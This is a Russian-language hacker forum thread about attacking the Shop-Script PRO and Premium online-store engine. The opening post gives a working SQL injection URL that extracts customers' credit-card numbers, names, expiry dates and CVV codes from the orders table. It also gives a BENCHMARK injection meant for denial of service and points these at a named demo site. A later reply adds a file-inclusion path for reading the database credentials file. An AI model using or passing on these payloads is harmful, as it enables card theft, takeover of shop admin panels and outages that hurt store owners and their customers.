Если в Pro версии движка интернет магазина Shop Script в браузере вбить:
http://адрес/admin.php?dpt=reports&sub=product_report&categoryID=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
То вы сможете попасть в админку:)Если Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии.
Также возможно проведение DDos атаки путём
http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BENCHMARK(10000000,BENCHMARK(1000 0000,md5(current_date)))

Вот пример сайта:)
http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryID=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
Только тут включён SafeMod:(

Похоже, что не ты нашел уязвимости..

Я тока насчёт DDos нашёл, а про админку я где-то в сети прочитал.Может кончно DDos уже раньше нашли)

Может я туплю, но доступ в админку есть и так - http://www.shop-script-demo.com/pro/admin.php
Как я понял это как бы демонстрация этого самого скрипта...показывается как выглядит там админка...и все...
Поправьте, если ошибаюсь...

Хм...Да, наверно.А то чёто я смотрю больше на другие сайты так не входит

Вот и я про тоже )
А жаль...искренне жаль )
Тему предлагаю закрыть...

/me пацталом %)))

жжёте парни...

баянчег http://www.cyberlords.net/advisories/cl_shop.txt

Короче, единственное что я смог найти, так это данные для подключения к БД, если очень повезёт они могут подойти и к админке.
Надо только дописать
/index.php?aux_page=../cfg/connect.inc.php
Если вы перейдёте на это страничку но ничего не будет написано( если будет написано "документ не найден на сервере" то ничего не плучится) если ничего не будет, будет просто пусто на том месте где должны быть ньюски, то просто посмотрите сорцы, там будет часть кода типа
db_username=""
bd_password=""
и т.д.:)

С журнала Хакер вроде инфа... там даже видео было